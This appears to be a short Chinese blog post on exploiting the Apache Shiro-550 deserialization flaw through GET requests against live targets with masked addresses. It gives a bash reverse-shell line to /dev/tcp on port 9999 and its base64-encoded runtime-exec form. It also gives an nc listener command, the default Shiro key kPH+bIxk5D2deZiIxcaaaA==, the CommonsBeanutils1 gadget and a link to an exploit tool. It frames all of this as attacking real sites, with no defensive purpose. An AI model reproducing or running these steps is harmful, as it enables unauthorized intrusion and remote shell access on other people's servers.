Shiro550-get型漏洞（验证+利用+反弹shell)

分享了Shiro550-POST型漏洞利用技巧，分享下get型实战技巧

常见条件

一般shiro550的get型隐患点不固定，如非登录口，伪静态页面可能都存在。简单经验归纳为靠近登录口的页面点和目标主站页面有可能存在

工具：飞鸿shiro检测v2.1

Shiro的利用不仅post数据包可以使用，get请求同样可以。使用界面工具可以看到返回特点：

认证不成功（账号密码错误），返回包会返回deleteMe=
认证成功（账号密码错误），返回包会返回rememberMe=

Shiro漏洞点：http://XXX.XXX.XXX.XXX/r/sellerSign.html?storeType=1

Bash编码网站http://www.jackson-t.ca/runtime-exec-payloads.html，

因为目标是linux系统，因此使用bash将其shell反弹过来：

将

bash -i >& /dev/tcp/XXX.XXX.XXX.XXX/9999 0>&1

使用bash加密为

bash -c {echo,XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX=}|{base64,-d}|{bash,-i}

攻击机开启nc监听

nc -lvvp 9999    //端口进行监听

成功反弹shell

V2.2版本飞鸿工具直接getshell

https://github.com/feihong-cs/ShiroExploit/releases

某实战目标：

http://XXX.XXX.XXX.XXX:88/tenement/a/login

[*] Using Key kPH+bIxk5D2deZiIxcaaaA==
[*] Using Gadget CommonsBeanutils1

经过确认，这个实战目标Shell是通过反弹回不来的，需要通过带外攻击OOB截取返回包获取shell，下篇分享OOB